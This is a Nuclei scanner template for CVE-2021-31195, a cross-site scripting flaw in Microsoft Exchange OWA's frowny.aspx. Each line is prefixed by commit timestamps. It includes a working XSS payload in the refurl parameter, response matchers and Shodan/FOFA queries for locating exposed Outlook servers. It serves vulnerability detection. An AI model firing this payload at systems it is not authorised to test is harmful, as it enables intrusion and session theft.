2022-09-23 17:53:08 +00:00
id : CVE-2021-31195
2021-08-17 08:25:38 +00:00
info :
2022-09-23 17:53:08 +00:00
name : Microsoft Exchange Server - Cross-Site Scripting
2021-08-17 08:25:38 +00:00
author : infosecsanyam
2023-08-31 11:46:18 +00:00
severity : medium
2022-09-23 17:53:08 +00:00
description : Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
2021-08-19 13:59:12 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
2022-09-23 17:53:08 +00:00
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195
- https://nvd.nist.gov/vuln/detail/CVE-2021-31195
2022-09-23 18:06:19 +00:00
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-09-23 17:53:08 +00:00
classification :
2023-08-31 11:46:18 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score : 6.5
2022-09-23 17:53:08 +00:00
cve-id : CVE-2021-31195
2022-09-23 18:06:19 +00:00
cwe-id : CWE-79
2024-06-07 10:04:29 +00:00
epss-score : 0.92082
epss-percentile : 0.98927
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
2022-07-04 08:46:15 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : microsoft
product : exchange_server
2024-06-07 10:04:29 +00:00
shodan-query :
- http.title:"Outlook"
- http.favicon.hash:1768726119
- http.title:"outlook"
- cpe:"cpe:2.3:a:microsoft:exchange_server"
fofa-query :
- title="outlook"
- icon_hash=1768726119
2024-05-31 19:23:20 +00:00
google-query : intitle:"outlook"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,microsoft,exchange,owa,xss
2021-08-17 08:25:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-17 08:25:38 +00:00
- method : GET
path :
- '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'
matchers-condition : and
matchers :
- type : word
words :
2021-08-17 10:22:22 +00:00
- 'alert(document.domain)//&et=ServerError'
- 'mail/bootr.ashx'
2021-08-17 09:30:05 +00:00
condition : and
2021-08-17 08:25:38 +00:00
2021-08-17 09:30:05 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-08-17 09:30:05 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 500
2024-06-08 16:02:17 +00:00
# digest: 4a0a0047304502200c9bc6152f452ae7228664bef82fa6563727c21333e3add63b2726fb4dd7b4e1022100e5f65d18bee6f51458ec66471225f36aff942abca74f8ae105b0b28ba8a73946:922c64590222798bb761d5b6d8e72950